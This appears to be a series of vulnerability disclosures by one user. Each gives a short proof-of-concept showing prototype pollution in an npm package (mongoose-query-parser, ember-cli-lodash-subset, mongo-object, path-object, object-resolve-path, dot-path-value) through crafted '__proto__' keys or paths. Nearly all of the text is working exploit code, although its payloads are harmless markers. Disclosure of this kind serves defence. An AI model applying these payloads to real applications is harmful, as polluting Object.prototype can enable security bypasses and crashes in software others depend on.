cstimkong

A PoC exploit:

```
const {MongooseQueryParser} = require('mongoose-query-parser');
let parser = new MongooseQueryParser();
parser.parse('__proto__!%3Dpolluted=', {});
// or parser.parse({'__proto__!=polluted': undefined}, {});
console.log(({}).$ne); // output: polluted
```

cstimkong

require('ember-cli-lodash-subset').merge({}, {['__proto__']: {polluted: 'yes'}});

cstimkong

var mo = require('mongo-object');
assert(({}).polluted === undefined);

mo.expandKey('yes', '__proto__[polluted]', {});
assert(({}).polluted === 'yes');

cstimkong

Proof of Concept exploit:

```
var Path = require('path-object')();
assert(({}).polluted === undefined);

Path().set('__proto__/__proto__/polluted', 'yes');
assert(({}).polluted === 'yes')
```

cstimkong

This vulnerability exists in `path.js` file of the package `object-resolve-path`.

Here is the PoC for the vulnerability.

```
var Path = require('object-resolve-path/path');
assert(({}).polluted === undefined);

Path.get(['__proto__', 'polluted']).setValueFrom({}, 'yes');

cstimkong

var path = require('dot-path-value');

assert(({}).polluted === undefined);

path.setByPath({}, '__proto__.polluted', 'yes'); // malicious code

assert(({}).polluted === 'yes');